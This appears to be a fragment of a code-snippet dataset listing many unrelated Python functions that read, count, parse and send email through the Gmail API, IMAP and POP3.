*\\n\"\n sys.exit(1)\n\n return mailBox", "def check_for_subscribers(mail, login_info):\n ADDRESS, PASSWORD = login_info\n\n try:\n mail.select('inbox')\n data = mail.search(None, 'ALL') \n except:\n mail = imaplib.IMAP4_SSL('imap.gmail.com')\n mail.login(ADDRESS, PASSWORD)\n mail.select('inbox')\n data = mail.search(None, 'ALL')\n \n mail_ids = data[1]\n id_list = mail_ids[0].split() \n\n if not id_list:\n return []\n\n first_email_id = int(id_list[0])\n latest_email_id = int(id_list[-1])\n\n subscribers = []\n\n for i in range(latest_email_id, first_email_id-1, -1):\n data = mail.fetch(str(i), '(RFC822)')\n for response_part in data:\n arr = response_part[0]\n if isinstance(arr, tuple):\n msg = email.message_from_string(str(arr[1],'utf-8'))\n email_from = msg['from']\n subscribers.append(email_from)\n\n return subscribers", "def main(): \r\n # Creating a storage.JSON file with authentication details\r\n # we are using modify and not readonly, as we will be marking the messages \r\n # as Read \r\n SCOPES = 'https://www.googleapis.com/auth/gmail.modify' \r\n store = file.Storage('storage.json') \r\n creds = store.get()\r\n if not creds or creds.invalid:\r\n flow = client.flow_from_clientsecrets('client_secret.json', SCOPES)\r\n creds = tools.run_flow(flow, store)\r\n GMAIL = discovery.build('gmail', 'v1', http=creds.authorize(Http()))\r\n \r\n messages_retrieved=0\r\n num_images=0\r\n save_dir,search_term = read_prefs() \r\n \r\n # Getting all the unread messages from Inbox\r\n unread_msgs = GMAIL.users().messages().list(userId='me',\r\n labelIds=['INBOX', 'UNREAD']).execute()\r\n \r\n # We get a dictonary. Now reading values for the key 'messages'\r\n try:\r\n mssg_list = unread_msgs['messages']\r\n print (\"Total unread messages in inbox: \", str(len(mssg_list)))\r\n except KeyError: #handle the keyerror on no new messages by exiting\r\n print ('No new messages - exiting.')\r\n return 0 \r\n \r\n #loop through the new messages list\r\n for i,mssg in enumerate(mssg_list):\r\n temp_dict = { }\r\n print(\"processing message {} of {}\".format(i+1,len(mssg_list)))\r\n m_id = mssg['id'] # get id of individual message\r\n # fetch the message using API\r\n message = GMAIL.users().messages().get(userId='me', id=m_id).execute() \r\n payld = message['payload'] # get payload of the message \r\n header = payld['headers'] # get header of the payload\r\n \r\n for field in header: # getting the Subject\r\n if field['name'] == 'Subject':\r\n msg_subject = field['value']\r\n temp_dict['Subject'] = msg_subject\r\n if field['name'] == 'Date':\r\n msg_date = field['value']\r\n date_parse = (parser.parse(msg_date))\r\n m_date = (date_parse.date())\r\n temp_dict['Date'] = str(m_date)\r\n else:\r\n pass\r\n \r\n try:\r\n\r\n # Fetching message body\r\n try: #if there is html/data only\r\n part_data = payld['body']['data'] # fetching data\r\n except: #if there are multiple parts get the html part\r\n part_data = payld['parts'][0]['body']['data'] # fetching data from the body\r\n # decoding from Base64 to UTF-8\r\n clean_one = part_data.replace(\"-\",\"+\").replace(\"_\",\"/\")\r\n clean_two = base64.b64decode (bytes(clean_one, 'UTF-8')) \r\n \r\n if search_term in temp_dict['Subject']:\r\n img_list= soup_process_email(clean_two.decode(\"utf8\"))\r\n print ('{} images found.'.format(len(img_list)))\r\n \r\n for i in (img_list):\r\n print (\"downloading: \" +i.split('/')[-1])\r\n #adding the email date to filepath\r\n write_dir=save_dir+temp_dict['Date']+'/'\r\n #checking if path exists (and making it if not)\r\n 
ensure_dir(write_dir) \r\n if \".jpg\" in i:\r\n # adding filename to write path\r\n write_dir=write_dir+\"/\"+i.split('/')[-1] \r\n else:\r\n # adding 'mp4' extension to movies and removing leading '?'\r\n filename=str(i.split('/')[-1])\r\n write_dir=write_dir+\"/\"+filename[1:]+\".mp4\" \r\n # check if file exists\r\n if not does_file_exist(write_dir):\r\n time.sleep(1) #rate limiting\r\n urllib.request.urlretrieve(i, write_dir) #downloading\r\n # num_images+=len(img_list)\r\n num_images+=1\r\n else:\r\n print ('file already downloaded')\r\n \r\n else:\r\n pass \r\n messages_retrieved+=1\r\n except Exception as e:\r\n print (\"Unexpected error:\", sys.exc_info()[0])\r\n print (\"Unexpected error:\", sys.exc_info()[1])\r\n print (\"Unexpected error:\", sys.exc_info()[2])\r\n except:\r\n pass \r\n \r\n #### This will mark the messages as read. when testing is complete\r\n GMAIL.users().messages().modify(userId='me', \r\n id=m_id,body={ 'removeLabelIds': ['UNREAD']}).execute() \r\n \r\n \r\n print (\"Total messages retrieved: \", messages_retrieved)\r\n print (\"Total images retrieved: \", num_images)", "def main():\n creds = None\n # The file token.pickle stores the user's access and refresh tokens, and is\n # created automatically when the authorization flow completes for the first\n # time.\n if os.path.exists('token.pickle'):\n with open('token.pickle', 'rb') as token:\n creds = pickle.load(token)\n # If there are no (valid) credentials available, let the user log in.\n if not creds or not creds.valid:\n if creds and creds.expired and creds.refresh_token:\n creds.refresh(Request())\n else:\n flow = InstalledAppFlow.from_client_secrets_file(\n 'credentials.json', SCOPES)\n creds = flow.run_local_server(port=0)\n # Save the credentials for the next run\n with open('token.pickle', 'wb') as token:\n pickle.dump(creds, token)\n\n service = build('gmail', 'v1', credentials=creds)\n\n # Calls the Gmail API to get Emails\n threads = listMessages(service, 'me', 'Jay Patel,')\n\n if not threads:\n print('No TUalerts found.')\n else:\n getCrimeLocation(service, 'me', threads)\n\n # Prints the TUlalerts (Mostly for testing purposes)\n printAlerts()", "def checkMsgNum(m):\n #mboxes = m.list()[1] Show all boxes\n m.select(\"INBOX\")#Select mailbox\n #data = m.search(None, \"(FROM \\\"default@gmail.com\\\")\") Search specific email addy\n #Change \"default@gmail.com\" in above to a specific email address to enable search from particular user\n items = m.search(None, \"(UNSEEN)\")\n msgNum = str(items[1]).rsplit(None)[-1].strip('[\\']')\n\n return msgNum", "def main():\n credentials = get_credentials()\n http = credentials.authorize(httplib2.Http())\n service = discovery.build('gmail', 'v1', http=http)\n\n messageIds = []\n i = 0\n nextPageToken = None\n while (i <= 15):\n try:\n response = service.users().messages().list(userId='me', q='after:2016/09/01', maxResults=10000, pageToken=nextPageToken).execute()\n messages = response.get('messages')\n nextPageToken = response['nextPageToken']\n\n for m in messages:\n messageIds.append(m['id'])\n\n i+=1 \n except KeyError:\n break\n\n senders = []\n counter = 0\n for i in messageIds:\n data = service.users().messages().get(userId='me', id=i).execute()\n for d in data['payload']['headers']:\n if d['name'] == 'Received':\n print(d['value'][d['value'].find('; ')+1:d['value'].find('(PST)')])\n if d['name'] == 'From' and 'bounce' not in d['value']:\n senders.append(d['value'])\n print(counter, ' ', d['value'])\n counter += 1\n break\n\n emails = []\n with 
open('out.csv', 'wb') as f:\n writer = csv.writer(f, delimiter=',')\n for person in set(senders):\n cleaned = clean_data(person)\n name = cleaned[0]\n email = cleaned[1]\n if email not in emails:\n emails.append(email)\n if name != None and email != None:\n writer.writerow([name, email])", "def run_mailcheck (self):\n\t\t# TODO: add function in backend to check if all needed things are set\n\t\t# like server/pass/user/... - if not, show error\n\t\t# if it is not currently refreshing\n\t\tif not self.__mailbackend.refreshing:\n\t\t\tself.__status = mail.MailCheckStatus.REFRESH \n\t\t\tself.redraw_canvas()\n\t\t\tself.__mailbackend.start()\n\t\treturn False\t# in case we are run as a timeout", "def main():\n creds = None\n # The file token.pickle stores the user's access and refresh tokens, and is\n # created automatically when the authorization flow completes for the first\n # time.\n if os.path.exists('token.pickle'):\n with open('token.pickle', 'rb') as token:\n creds = pickle.load(token)\n # If there are no (valid) credentials available, let the user log in.\n if not creds or not creds.valid:\n if creds and creds.expired and creds.refresh_token:\n creds.refresh(Request())\n else:\n flow = InstalledAppFlow.from_client_secrets_file(\n 'credentials.json', SCOPES)\n creds = flow.run_local_server()\n # Save the credentials for the next run\n with open('token.pickle', 'wb') as token:\n pickle.dump(creds, token)\n\n\n service = build('gmail', 'v1', credentials=creds)\n\n labels = ListLabels(service, 'me')\n\n messages = ListMessagesWithLabels(service, 'me', label_ids=[\"CATEGORY_FORUMS\"])", "def email_startup():\n imap = imaplib.IMAP4_SSL('imap.gmail.com')\n # authenticate\n imap.login(email_credentials.email_user, email_credentials.email_pass)\n return imap", "def get_unread_email_ids(gmail_client):\n response = gmail_client.users().messages().list(userId='me',q='is:unread').execute()\n\n if 'messages' in response: # messages key only exists if there are unread messages\n return [message['id'] for message in response['messages']]\n else:\n print(\"No unread messages...\")\n return [] # still return a list since that's what caller expects", "def checkUserEmail(email, number):\n\n if number == 1:\n flag = 0\n atflag = False\n for i in email:\n if i == \"@\":\n atflag=True\n flag += 1\n if i == \".\" and atflag:\n flag += 1\n if flag != 2:\n return False\n return True\n if number == 2:\n c.execute(\"select email from users where email = ?\", (email,))\n if c.fetchall():\n return True\n return False", "def reachable(self):\n service = build('gmail', 'v1', http=Http(timeout=1.0))\n url = urlparse.urlparse(service._baseUrl)\n host = url.hostname\n port = url.port\n try:\n socket.getaddrinfo(host, port, proto=socket.IPPROTO_TCP)\n except (socket.herror, socket.gaierror, URLError, OSError):\n return False\n return True", "def main():\n credentials = get_credentials()\n http = credentials.authorize(httplib2.Http())\n service = discovery.build('gmail', 'v1', http=http)\n\n\n lists,nextPageToken = ListMessages(service,user_id = 'me',q='subject:tradingview')\n # print (lists)\n mes,mes_str = GetMimeMessage(service,user_id = 'me',msg_id = lists[0]['id'])\n print (mes)\n\n\n j = 0\n for part in mes.walk(): \n j = j + 1 \n fileName = part.get_filename() \n contentType = part.get_content_type() \n mycode=part.get_content_charset(); \n # 保存附件 \n if fileName:\n print ('hhhhhhhhhhhhh')\n elif contentType == 'text/plain' or contentType == 'text/html': \n #保存正文 \n data = part.get_payload(decode=True) \n 
content=str(data); \n # if mycode=='gb2312': \n # content= mbs_to_utf8(content) \n #end if \n # nPos = content.find('降息') \n # print(\"nPos is %d\"%(nPos)) \n # print >> f, data \n # 正则替换掉所有非 <a></a>的标签 <[^>|a]+>\n # reg = re.compile('<[^>|a]+>')\n contentTxt = re.compile('<[^>|a]+>').sub('',content)\n print (reg.sub('',content))\n #end if \n\n\n \n # help(mes)\n # for i in mes.values():\n # print (i)\n # # print (mes[i]);\n # print (\"----------\")\n # print (mes['from'])\n # print (type (mes))\n # # print \n # parsed = Parser().parsestr(mes)\n # print (parsed)\n # print (mes)\n # for i in mes:\n # print (i)\n # for item in lists:\n # mes = GetMimeMessage(service,user_id = 'me',msg_id = item['id'])\n # # print (mes)\n # parsed = Parser().parsestr(mes)\n # print (parsed)", "def check_mail(self, update=False):\r\n return self.check_mail_dir(update=update)", "def main():\n credentials = get_credentials()\n http = credentials.authorize(httplib2.Http())\n service = discovery.build('gmail', 'v1', http=http)\n user_id = 'me'\n\n ## get_labels ##\n #print_all_labels(service,user_id)\n #fetch_and_store(service,user_id)\n #apply_rules()", "def filter_unread(check_what, criteria, return_what):\n imap = imaplib.IMAP4_SSL(config[\"email\"][\"server\"])\n imap.login(config[\"email\"][\"user\"], config[\"email\"][\"pass\"])\n status, messages = imap.select(\"INBOX\")\n \n status, response = imap.search(None, '(UNSEEN)')\n unread_msg_nums = response[0].split()\n\n ret = [] \n for i in unread_msg_nums:\n parse_return = parse(imap, i, check_what, criteria, return_what)\n if parse_return is not None:\n ret.append(parse_return)\n set_unseen(imap, i)\n imap.close()\n imap.logout()\n\n return ret", "def go():\n # Authenticate\n print('****************** Authenticate ******************')\n\n creds = None\n\n if os.path.exists('token.pickle'):\n with open('token.pickle', 'rb') as token:\n print('****************** Load Token ******************')\n\n creds = pickle.load(token)\n\n if not creds or not creds.valid:\n print('****************** Credentials ******************')\n\n if creds and creds.expired and creds.refresh_token:\n print('****************** Refresh Credentials ******************')\n\n creds.refresh(Request())\n else:\n print('****************** Load Credentials ******************')\n\n flow = InstalledAppFlow.from_client_secrets_file('credentials.json', SCOPES)\n creds = flow.run_local_server(port=0)\n\n with open('token.pickle', 'wb') as token:\n print('****************** Dump Token ******************')\n\n pickle.dump(creds, token)\n\n print('****************** Load Service ******************')\n\n service = build('gmail', 'v1', credentials=creds)\n\n # Set Date Range\n print('****************** Set Date Range ******************')\n \n start_datetime = datetime.today() - timedelta(days=2)\n end_datetime = datetime.today() + timedelta(days=2)\n\n start_date = start_datetime.strftime(\"%Y/%m/%d\")\n end_date = end_datetime.strftime(\"%Y/%m/%d\")\n\n print(start_date)\n print(end_date)\n\n # Set Query\n print('****************** Set Query ******************')\n\n user_id = 'me'\n full = 'full'\n query = 'after:' + start_date + ' before:' + end_date + ' subject:Your Single Transaction Alert from Chase'\n\n print(query)\n\n # List Messages (All Pages)\n print('****************** Run Query ******************')\n\n response = service.users().messages().list(userId=user_id, q=query).execute()\n\n messages_all_pages = []\n\n if 'messages' in response:\n messages_all_pages.extend(response['messages'])\n\n 
while 'nextPageToken' in response:\n page_token = response['nextPageToken']\n response = service.users().messages().list(userId=user_id, q=query, pageToken=page_token).execute()\n messages_all_pages.extend(response['messages'])\n\n messages = messages_all_pages\n\n # Find Transactions in Message List\n if not messages:\n print('No messages found...')\n else:\n for message in messages:\n queue_id = message['id']\n\n # Get Message\n this_message = service.users().messages().get(userId=user_id, id=queue_id, format=full).execute()\n\n # Set Message\n message_body = this_message['payload']['body']['data']\n message_html = base64.urlsafe_b64decode(message_body)\n message_text = message_html.decode('utf-8').replace('($USD) ', '')\n\n # Set Transaction Date\n date_message = int(this_message['internalDate'])\n date_object = (date_message / 1000)\n transaction_date = datetime.fromtimestamp(date_object).strftime(\"%Y-%m-%d\")\n\n # Set Amount\n amount = re.search('A charge of (.+?) at', message_text).group(1)\n\n # Set Description\n description = re.search('at (.+?) has', message_text).group(1)\n\n # Build Transaction\n transaction = {\n 'QueueID': queue_id,\n 'TransactionTypeID': 2,\n 'TransactionDT': transaction_date,\n 'Description': description,\n 'Amount': amount,\n 'BudgetCategoryID': '103',\n 'TransactionNumber': '',\n 'Note': 'CC'\n }\n\n print('****************** Transaction Found ******************')\n print(transaction)\n\n # Send to Queue\n response_data = requests.post(url=BUDGET_API, data=transaction)\n\n result = response_data.text\n\n if result == '1':\n print('****************** Transaction Queued ******************')", "def get_unread_count(username, password):\n obj = imaplib.IMAP4_SSL('imap.gmail.com', '993')\n obj.login(username, password)\n obj.select('Inbox')\n message_ids = obj.search(None, \"UNSEEN\")[1]\n list_of_split_strings = str(message_ids).split(\" \")\n unread = len(list_of_split_strings)\n # speak(str(unread))\n return unread", "def connect(self):\n\n mail = Account(self.email, oauth2_token=self.access_token)\n trash_folder = mail.trash_mailbox()\n if pygmail.errors.is_error(trash_folder):\n return False\n else:\n self.mail = mail\n self.trash_folder = trash_folder\n self.inbox = mail.all_mailbox()\n return True", "def main():\n token = 'C:/Users/asif.rouf/PycharmProjects/pythonProject/AX_Admin_portal/Test/utils/google-api-token.json'\n credential = 'C:/Users/asif.rouf/PycharmProjects/pythonProject/AX_Admin_portal/Test/utils/google-api-credentials.json'\n creds = None\n # The file token.json stores the user's access and refresh tokens, and is\n # created automatically when the authorization flow completes for the first\n # time.\n if os.path.exists(token):\n creds = Credentials.from_authorized_user_file(token, SCOPES)\n # If there are no (valid) credentials available, let the user log in.\n if not creds or not creds.valid:\n if creds and creds.expired and creds.refresh_token:\n creds.refresh(Request())\n else:\n flow = InstalledAppFlow.from_client_secrets_file(\n credential, SCOPES)\n creds = flow.run_local_server(port=0)\n # Save the credentials for the next run\n # with open('token.json', 'w') as token:\n # token.write(creds.to_json())\n\n service = build('gmail', 'v1', credentials=creds)\n\n # # Call the Gmail API\n # results = service.users().labels().list(userId='me').execute()\n # labels = results.get('labels', [])\n #\n # if not labels:\n # print('No labels found.')\n # else:\n # print('Labels:')\n # for label in labels:\n # print(label['name'])\n\n # Call the 
Gmail API to fetch INBOX\n results = service.users().messages().list(userId='me', labelIds=['INBOX']).execute()\n messages = results.get('messages', [])\n # message1 = messages[0]\n # print(message1)\n message1 = {'id': '17a5ca5f5f4bd0aa', 'threadId': '17a5b1bb861b3bc2'}\n message1 = {'id': '17a5cbc54c546465', 'threadId': '17a5b1bb861b3bc2'}\n\n # message1 = {'id': '17a5b852afe04a52', 'threadId': '17a50c997c059e68'}\n print(messages)\n print(message1)\n\n if not messages:\n print(\"No messages found.\")\n else:\n print(\"Message snippets:\")\n # for message in messages:\n # msg = service.users().messages().get(userId='me', id=message['id']).execute()\n # print(messages)\n # print(msg['snippet'])\n\n # msg = service.users().messages().get(userId='me', id=message1['id']).execute()\n # print(msg['snippet'])\n ###############################\n msg = service.users().messages().get(userId='me', id=message1['id'], format='raw').execute()\n msg_str = base64.urlsafe_b64decode(msg['raw'].encode('ASCII'))\n mime_msg = email.message_from_bytes(msg_str)\n print(msg['snippet'])\n print(mime_msg)\n print(mime_msg['Date'])\n print(mime_msg['From'])\n print(mime_msg['To'])\n print(mime_msg['Subject'])\n #\n # print(datetime.utcnow())\n\n ######################################################\n # msg = service.users().messages().get(userId='me', id=message1['id'], format='full').execute()\n # # parts can be the message body, or attachments\n # payload = msg['payload']\n # headers = payload.get(\"headers\")\n # parts = payload.get(\"parts\")\n # # print(payload)\n # # print(parts)\n # # print(headers)\n # for header in headers:\n # print(header['name'])\n # print(header['value'])\n #\n ######################################################\n msg = service.users().messages().get(userId='me', id=message1['id']).execute()\n\n # Use try-except to avoid any Errors\n try:\n # Get value of 'payload' from dictionary 'txt'\n payload = msg['payload']\n headers = payload['headers']\n subject = ''\n sender = ''\n\n # Look for Subject and Sender Email in the headers\n for d in headers:\n if d['name'] == 'Subject':\n subject = d['value']\n if d['name'] == 'From':\n sender = d['value']\n # The Body of the message is in Encrypted format. So, we have to decode it.\n # Get the data and decode it with base 64 decoder.\n parts = payload.get('parts')[0]\n data = parts['body']['data']\n data = data.replace(\"-\", \"+\").replace(\"_\", \"/\")\n decoded_data = base64.b64decode(data)\n\n # Now, the data obtained is in lxml. 
So, we will parse\n # it with BeautifulSoup library\n soup = BeautifulSoup(decoded_data, \"lxml\")\n body = soup.body()\n\n # Printing the subject, sender's email and message\n print(\"Subject: \", subject)\n print(\"From: \", sender)\n print(\"Message: \", body)\n # for link in soup.find_all('a', href=True):\n # print(link['href'])\n link = soup.find('a', href=True)\n print(link['href'])\n except:\n pass", "def getIdeaUrlsFromEmail():\n credentials = get_credentials()\n http = credentials.authorize(httplib2.Http())\n service = discovery.build('gmail', 'v1', http=http)\n\n\n lists,nextPageToken = ListMessages(service,user_id = 'me',q='from:noreply@tradingview.com')\n # print (lists)\n mes,mes_str = GetMimeMessage(service,user_id = 'me',msg_id = lists[0]['id'])\n # print (mes)\n j = 0\n urls = []\n for part in mes.walk(): \n j = j + 1 \n fileName = part.get_filename() \n contentType = part.get_content_type() \n mycode=part.get_content_charset(); \n # 保存附件 \n if fileName:\n print ('保存邮件附件……TODO?')\n elif contentType == 'text/html': #or contentType == 'text/plain' \n #保存正文 \n data = part.get_payload(decode=True) \n content=str(data); \n # if mycode=='gb2312': \n # content= mbs_to_utf8(content) \n #end if \n # nPos = content.find('降息') \n # print(\"nPos is %d\"%(nPos)) \n # print >> f, data \n # 正则替换掉所有非 <a></a>的标签 <[^>|a]+>\n # reg = re.compile('<[^>|a]+>')\n # print (content)\n url,title = findIdeaUrlInHtml(content)\n urls.append((url,title))\n # print (url,title)\n # contentTxt = re.compile('<[^>|a]+>').sub('',content)\n # print (reg.sub('',content))\n # #end if \n\n return urls", "def gmail(arg):\n if not arg:\n return GOOGLE_MAIL\n search_content = arg\n account_num = '0'\n ret_url = GOOGLE_MAIL + account_num + (('/#search/' + search_content) if search_content else '')\n print('returning url {}'.format(ret_url))\n return ret_url", "def readMail(m, msgNum):#Read a particular email\n resp, data = m.fetch(msgNum, \"(RFC822)\")\n email_body = data[0][1]\n mail = email.message_from_string(email_body)\n #temp = m.store(emailid,'+FLAGS', '\\\\Seen')\n m.expunge()\n\n\n return mail", "def IsGoogler():\n p = subprocess.run('goma_auth info',\n stdout=subprocess.PIPE,\n stderr=subprocess.PIPE,\n universal_newlines=True,\n shell=True)\n if p.returncode != 0:\n return False\n lines = p.stdout.splitlines()\n if len(lines) == 0:\n return False\n l = lines[0]\n # |l| will be like 'Login as <user>@google.com' for googler using goma.\n return l.startswith('Login as ') and l.endswith('@google.com')", "def verify_mail(self):\n raise NotImplementedError", "def fetch_mailbox((mailbox, host, user, passwd)):\r\n\r\n global text, attachments\r\n\r\n ## login to the pop3 server ==============================\r\n print\r\n print \"###### Connecting to %s\" % host\r\n M = poplib.POP3(host)\r\n M.set_debuglevel(1)\r\n M.user(user)\r\n M.pass_(getpass.getpass())\r\n\r\n ## create the mailbox and attachments directories if required\r\n if not os.path.exists (mailboxdir):\r\n print \"Creating Directory %s\", mailboxdir\r\n os.mkdir (mailboxdir)\r\n\r\n att_dir = \"%s\\\\att_%s\" % (mailboxdir, mailbox)\r\n if not os.path.exists (att_dir):\r\n print \"Creating Directory %s\", att_dir\r\n os.mkdir (att_dir)\r\n\r\n \r\n ## get list of uidls in the mailbox file =================\r\n uidls = get_mailbox_uidls(mailbox)\r\n\r\n ## get number of messages ================================\r\n numMessages = len(M.list()[1])\r\n print \"There are %d messages on the server\" % numMessages\r\n\r\n\r\n ## get uidls from server and 
compare with the uidls in the\r\n ## mailbox ===============================================\r\n uidls_srv = M.uidl()\r\n list = uidls_srv[1]\r\n fetchlist = []\r\n for item in list:\r\n msgno, uidl = item.split(' ')\r\n msgno = int(msgno)\r\n if not uidl in uidls:\r\n print \"Found new message: (%d, %s)\" % (msgno, uidl)\r\n fetchlist.append(msgno)\r\n\r\n print \"There are %d new messages on the server\" % len(fetchlist)\r\n\r\n alltext = \"\" ## this variable contains the mbox contents\r\n\r\n ## go over all of the emails =============================\r\n for i in fetchlist:\r\n\r\n flatmsg = \"\"\r\n\r\n ## retreive message\r\n# for line in M.retr(i+1)[1]:\r\n for line in M.retr(i)[1]:\r\n flatmsg += line + \"\\r\\n\"\r\n\r\n ## parse message\r\n msg = email.message_from_string (flatmsg)\r\n\r\n ## handle Email.message object\r\n title = handleMsg(mailbox, msg)\r\n\r\n\r\n msgtext = \"%s\\n%s* UIDL: %s\\n%s\\n\\n\" % (''.center(70,'#'), title, uidl, text)\r\n if not attachments == \"\":\r\n msgtext += \"#### Attachments:\\n%s\" % attachments\r\n\r\n alltext = msgtext.replace('\\r\\n','\\n') + alltext\r\n\r\n ## add 'alltext' to the beginning of the mailbox file ====\r\n mboxfile = \"%s\\\\%s.mbx\" % (mailboxdir, mailbox)\r\n contents = \"\"\r\n if os.path.exists(mboxfile):\r\n mbox = open(mboxfile, \"rt\")\r\n contents = mbox.read()\r\n mbox.close()\r\n\r\n mbox = open(mboxfile, \"wt\")\r\n mbox.write (alltext)\r\n if contents != \"\":\r\n mbox.write (contents)\r\n\r\n mbox.close()\r\n\r\n return len(fetchlist)", "def main():\n credentials = get_credentials()\n http = credentials.authorize(httplib2.Http())\n service = discovery.build('gmail', 'v1', http=http)\n\n results = service.users().labels().list(userId='me').execute()\n labels = results.get('labels', [])\n\n FPS = 30\n WINDOWWIDTH = 480\n WINDOWHEIGHT = 320\n\n WHITE = (255, 255, 255)\n RED = (255, 0, 0)\n BLUE = (0, 0, 255)\n GREEN = (0, 255, 0)\n BLACK = (0, 0, 0)\n LIGHTGREEN = (53, 230, 97)\n LIGHTBLUE = (53, 156, 230)\n LIGHTORANGE = (242, 109, 19)\n\n windowBgColor = WHITE\n\n pygame.init()\n FPSCLOCK = pygame.time.Clock()\n DISPLAYSURFACE = pygame.display.set_mode((WINDOWWIDTH, WINDOWHEIGHT))\n pygame.display.set_caption('PLUTO')\n\n myfont = pygame.font.Font(None, 30)\n label = myfont.render(\"<-- Enter address\", 1, BLACK)\n\n buttonEnterEmail = pygbutton.PygButton((10, 10, 100, 80), 'Enter Email', bgcolor=LIGHTORANGE)\n buttonScan = pygbutton.PygButton((10, 100, 225, 210), 'Scan and Send', bgcolor=LIGHTGREEN, font=myfont)\n buttonReceive = pygbutton.PygButton((245, 100, 225, 210), 'Receive and Print', bgcolor=LIGHTBLUE, font=myfont)\n buttonPrintICR = pygbutton.PygButton((370, 10, 100, 80), 'Letterhead', bgcolor=RED)\n winBgButtons = (buttonEnterEmail, buttonScan, buttonReceive, buttonPrintICR)\n\n allButtons = winBgButtons\n\n userinput = \"\"\n\n while True:\n for event in pygame.event.get(): # event handling loop\n \n if event.type == QUIT or (event.type == KEYDOWN and event.key == K_ESCAPE):\n pygame.quit()\n sys.exit()\n\n if 'click' in buttonReceive.handleEvent(event): #User called for printing of file\n \n idenListCurr = ListMessagesMatchingQuery(service, 'me', 'in:inbox')\n idenListLast = None\n \n #if idenListLast != idenListCurr: #to be used in future with inbox functionality\n\n #msgList = [] #should be a way to do this where only add the new messages\n \n #for each in idenListCurr:\n #iden = each[u'id']\n #mimeMsg = GetMimeMessage(service, 'me', iden)\n \n #msgList.append(mimeMsg)\n\n #idenListLast = 
idenListCurr\n \n\n #displayInterface(msgList)\n htmlMsg = GetRawMessageHtml(service, 'me', idenListCurr[0][u'id'])\n writeFile(htmlMsg, \"temp\", \"html\")\n \n try:\n pdfkit.from_file(\"/home/pi/git/PlutoTest/temp.html\", \"temp.pdf\") #change to your directory\n except IOError:\n pass\n \n popup = Popup(DISPLAYSURFACE)\n tempInput = popup.run(\"Your message will print\")\n printCups.executePrint(\"/home/pi/git/PlutoTest/temp.pdf\") #change to your directory\n os.remove(\"/home/pi/git/PlutoTest/temp.pdf\") #change to your directory\n os.remove(\"/home/pi/git/PlutoTest/temp.html\") #change to your directory\n time.sleep(5)\n \n if 'click' in buttonScan.handleEvent(event):#user called for scanning and sending of file\n scan.executeScan(\"temp\")\n \n message = CreateMessageWithAttachment(\"example.pluto.email@gmail.com\", userinput, \"Hello from Pluto!\", \"Enjoy!\",\n \"/home/pi/git/PlutoTest/\", \"temp.png\") #change to your email, directory\n SendMessage(service, 'me', message)\n \n \n os.remove(\"/home/pi/git/PlutoTest/temp.png\") #change to your directory\n popup = Popup(DISPLAYSURFACE)\n tempInput = popup.run(\"Your message has been sent\")\n print(\"sent\")\n time.sleep(5)\n \n if 'click' in buttonEnterEmail.handleEvent(event): #user called to enter e-mail address\n vkeybd = VirtualKeyboard(DISPLAYSURFACE)\n tempInput = vkeybd.run(\"...\")\n if tempInput != \"...\":\n userinput = tempInput\n label = myfont.render(\"To: \" + userinput, 1, BLACK)\n \n if 'click' in buttonPrintICR.handleEvent(event): #user called to print letterhead\n popup = Popup(DISPLAYSURFACE)\n tempInput = popup.run(\"The letterhead will print\")\n printCups.executePrint(\"/home/pi/git/PlutoTest/DemoPaper.png\") #change to your directory\n time.sleep(5)\n\n\n DISPLAYSURFACE.fill(windowBgColor)\n\n for b in allButtons:\n b.draw(DISPLAYSURFACE)\n\n # draw the text onto the surface\n DISPLAYSURFACE.blit(label, (120, 35, 350, 80))\n\n pygame.display.update()\n FPSCLOCK.tick(FPS)", "def get_unread_email_data(gmail_client):\n unread_ids = get_unread_email_ids(gmail_client)\n\n for message_id in unread_ids:\n remove_unread_label = {'removeLabelIds': ['UNREAD']}\n gmail_client.users().messages().modify(userId='me', id=message_id, body=remove_unread_label).execute()\n\n message_data = gmail_client.users().messages().get(userId='me',id=message_id).execute()\n message_payload = message_data['payload']\n has_attachment = 0 < len([part for part in message_payload['parts'] if part['mimeType'] == 'image/jpeg'])\n \n message_headers = message_payload['headers']\n sender = [header['value'] for header in message_headers if header['name'] == 'Return-Path'][0]\n yield sender, has_attachment", "def get_emails():\n\n # generate the gmail api service\n service = build_gmail_api_v1()\n\n # compute date for one year ago\n today = date.today()\n one_year_ago = today - timedelta(days=365.25)\n start = one_year_ago - timedelta(days=1)\n end = one_year_ago + timedelta(days=1)\n start_string = start.strftime(\"%Y/%m/%d\")\n end_string = end.strftime(\"%Y/%m/%d\")\n query_string = f'after:{start_string} before:{end_string}'\n\n # generate the gmail api request (get list of messages from one year ago)\n request = service.users().messages().list(userId='me', q=query_string)\n\n # try to get the api response\n try:\n response = request.execute()\n except HTTPError as e:\n print('Error response status code : {0}, reason : {1}'.format(\n e.resp.status, e.error_details))\n return []\n\n # get list of message ids from the api response\n messages = 
list(response[\"messages\"])\n ids = [message[\"id\"] for message in messages]\n\n # store all emails in a list\n data_to_display = []\n\n # loop through each message id\n for id in ids:\n\n try:\n # store email data in a dict\n email = {}\n\n # get message data by querying gmail api using message id\n request = service.users().messages().get(userId='me', id=id)\n response = request.execute()\n\n # get date, subject, from, to, etc from message header\n headers = list(response[\"payload\"][\"headers\"])\n looking_for = [\"Date\", \"Subject\", \"From\", \"To\"]\n for header in headers:\n if header[\"name\"] in looking_for:\n email[header[\"name\"]] = header[\"value\"]\n\n # try to get message body (base64) from response\n # the json structure varies a lot so that is why there are no many try/except\n try:\n base64_message = response[\"payload\"][\"parts\"][0][\"parts\"][0][\"body\"][\"data\"]\n except (KeyError, TypeError) as e:\n try:\n base64_message = response[\"payload\"][\"parts\"][1][\"body\"][\"data\"]\n except (KeyError, TypeError, IndexError) as e:\n try:\n base64_message = response[\"payload\"][\"parts\"][0][\"body\"][\"data\"]\n except (KeyError, TypeError, IndexError) as e:\n try:\n base64_message = response[\"payload\"][\"body\"][\"data\"]\n except (KeyError, TypeError, IndexError) as e:\n base64_message = \"Ti9B\"\n\n # decode the email body\n email[\"body\"] = base64.urlsafe_b64decode(\n base64_message).decode('utf-8')\n\n # populate list with email\n data_to_display.append(email)\n\n except HTTPError as e:\n print('Error response status code : {0}, reason : {1}'.format(\n e.resp.status, e.error_details))\n\n return data_to_display", "def Check_SMTP(name, my_ip):\n\n if nslookup(name)[0] != 0:\n add_info (name, SMTP_SERVER, \"cannot resolve SMTP server\")\n return 1\n if ping_machine(name) != 0:\n add_info(name, SMTP_SERVER, \"cannot ping SMTP server\")\n return 2\n\n status, err = tryconnect(name, SMTP_PORT)\n if status == 1 or status == 2:\n add_info(name, SMTP_SERVER, err)\n if status == 1:\n # if we time'd out, things can still be OK (say reverse DNS problems)\n # so return only an error if no 